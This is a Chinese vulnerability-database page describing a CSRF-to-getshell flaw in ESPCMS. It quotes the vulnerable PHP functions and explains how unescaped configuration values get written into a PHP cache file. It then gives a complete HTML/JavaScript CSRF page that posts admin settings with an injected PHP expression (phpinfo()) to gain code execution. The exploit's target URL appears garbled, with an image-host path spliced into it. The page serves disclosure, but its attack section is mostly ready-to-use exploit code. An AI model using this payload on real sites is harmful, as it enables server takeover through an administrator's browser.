|espcms最新版本CSRF直接getshell - VULHUB开源网络安全威胁库

espcms最新版本CSRF直接getshell

- AV AC AU C I A

发布： 2025-04-13

修订： 2025-04-13

### 简要描述： espcms 最新版本csrf 直接getshell ### 详细说明：这里我们首先看看，存在的代码问题 management.php:(lines:711-741): ``` function onsetsave() { $db_table = db_prefix . 'config'; $commandfile = admin_ROOT . 'datacache/command.php'; if (!$this->fun->filemode($commandfile)) { exit('false'); } $old_ishtml = $this->CON['is_html']; $sql = 'SELECT * FROM ' . $db_table . ' WHERE groupid<=8 AND isline=0 ORDER BY groupid'; $rs = $this->db->query($sql); while ($rsList = $this->db->fetch_assoc($rs)) { if ($rsList['groupid'] == 5 && !$this->get_app_view('bbs', 'isetup')) { continue; } if ($rsList['groupid'] == 7 && !$this->get_app_view('touch', 'isetup')) { continue; } if ($rsList['groupid'] == 8 && !$this->get_app_view('im', 'isetup')) { continue; } $db_set = "value='" . $this->fun->accept($rsList['valname'], 'P') . "'"; $db_where = 'id=' . $rsList['id']; $this->db->query('UPDATE ' . $db_table . ' SET ' . $db_set . ' WHERE ' . $db_where); } $this->db->query("UPDATE $db_table SET value='" . admin_URL . "' WHERE valname='domain'"); $this->systemfile(true); ``` 看到这个函数我们跟进去看看$this->systemfile(true)： class_connector.php:(lines:514-543): ``` function systemfile($trueclass = false) { $commandfile = admin_ROOT . 'datacache/command.php'; $varget = "4:'1T<#HO+W=W=RYE8VES<\"YC;B\`"; if (!is_file($commandfile) || $trueclass) { $sConfig = "<?php\n"; $sConfig = $sConfig . '// uptime:' . date('Y-m-d H:i:s', time()) . "\n"; $sConfig = $sConfig . "// ECISP.CN \n"; $sConfig = $sConfig . "\$CONFIG=Array(\n"; $db_table = db_prefix . 'config'; $sql = "SELECT valname,content,value,valtype FROM $db_table where isline=0 ORDER BY groupid"; $rs = $this->db->query($sql); while ($rsList = $this->db->fetch_assoc($rs)) { $valname = $rsList['valname']; $value = $rsList['value']; $valtype = $rsList['valtype']; $content = $rsList['content']; if ($valtype == 'int' || $valtype == 'bool') { $value = empty($value) ? 0 : $value; $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>' . $value . ",\n"; } else { $sConfig = $sConfig . "\x20\x20\x20\x20 '" . $valname . '\'=>\'' . $value . "',\n"; } } $sConfig = $sConfig . ")\n"; $sConfig = $sConfig . '?' . '>'; if (!$this->fun->filewrite($commandfile, $sConfig)) { exit('System File Error!'); } } include $commandfile; ``` 这里我们看明白了已经，这里从数据库里面原封不动的取出来，然后写进缓存配置文件的，那我们举例子分析一下如果我们配置的是sss' 那么gpc就会给我们转义为sss\' 存储到数据库，但是我们二次取出来的时候就变成了sss'所以这里我们写配置文件的时候特殊字符等于没有做任何处理。直接看我操作： [<img src="https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png" alt="15.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/111429125550a12c5eece093ed4bb64bc388b2d1.png) 我们去访问一下这个command.php,看看效果: [<img src="https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png" alt="16.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/11143004260d507b04d51f599d1554c486206d65.png) 完美执行.......... ``` <html> <body> <script> function csrf_shell(){ var xhr = new XMLHttpRequest(); xhr.open("POST", "http://192.168.10.70/ESPCMSV6000140909_INSTALLhttps://images.seebug.org/upload/adminsoft/index.php?archive=management&action=setsave", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8"); xhr.withCredentials = "true"; var body='is_close=0&close_content=%E6%8A%B1%E6%AD%89%EF%BC%9A%E7%BD%91%E7%AB%99%E6%AD%A3%E5%9C%A8%E7%BB%B4%E6%8A%A4%E4%B8%AD%EF%BC%8C%E7%BB%99%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%BE%BF%E6%B7%B1%E8%A1%A8%E6%AD%89%E6%84%8F%EF%BC%81'%2Bphpinfo()%2C%2F%2F&icpbeian=&sitename=test&admine_mail=admin%40admin.com&is_log=1&is_gzip=1&cli_time=8&default_lng=cn&is_alonelng=0&home_lng=cn&is_html=0&is_rewrite=0&file_fileex=html&entrance_file=index&file_htmldir=html%2F&is_getcache=0&is_caching=0&cache_time=3600&http_pathtype=1&member_menu=1&mem_isclose=1&mem_isseccode=1&mem_regisseccode=0&mem_isemail=0&mem_lock=www%2Cbbs%2Cdemo%2Ctest%2Cftp%2Cmail%2Cuser%2Cusers%2Cadmin%2Cadministrator&mem_isclass=0&mem_did=cn%3A0%2Cen%3A0&mem_isaddress=0&mem_isucenter=0&mem_ucdbhost=localhost&mem_ucdbuser=root&mem_ucdbpw=&mem_ucdbname=ucenter&mem_ucdbchart=utf8&mem_ucdbtable=uc_&mem_uckey=sdaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&mem_ucapi=&mem_ucchart=utf-8&mem_ucapiid=0&enquiry_menu=1&is_enquiry_memclass=0&order_menu=1&order_ismember=1&order_integral=10&order_discount=100&order_snfont=ESP-&order_moneytype=%EF%BF%A5&order_max_list=3&order_companyname=&order_contact=&order_province=&order_city=&order_add=&order_post=&order_tel=&order_moblie=&upfile_pictype=jpg%7Cpng%7Cgif%7Cphp&uifile_movertype=swf%7Cmpg%7Cflv%7Cmp4&upfile_filetype=zip%7Crar%7Cdoc%7Cxls%7Cpdf&upfile_maxsize=100000000&img_dirtype=m3&img_cfiletype=d&img_width=200&img_height=200&img_bgcolor=%23ffffff&img_quality=80&img_issmallpic=0&img_iszoom=1&img_iswater=0&img_wmt_text=ESPCMS&img_wmt_size=25&img_wmt_color=%23ffffff&img_wmt_pos=9&img_wmt_transparent=20&img_wmi_file=watermark.png&img_wmi_pos=9&img_wmi_transparent=50&input_isdes=1&input_isdescription=250&input_isdellink=0&is_inputclose=1&input_click=0&is_keylink=1&input_color=%23000000&is_email=0&smtp_type=2&mail_cat=1&smtp_server=&smtp_port=25&mail_send=&smtp_username=&smtp_password=&is_moblie=0&moblie_userid=&moblie_smssnid=&moblie_smskey=&moblie_number=&sitecoedb=7a6355a4a18b136036439cc61efe069b&scode_bgcolor=%230080ff&scode_fontcolor=%23ffffff&scode_adulterate=1&scode_shadow=0&tip_searchtime=10'; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } csrf_shell(); </script> </body> </html> ``` 完了 ### 漏洞证明：

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息

您还没有登录，登录后可查看更多

添加资源
收藏资源
问题反馈

贡献用户

暂无贡献用户

VULHUB ™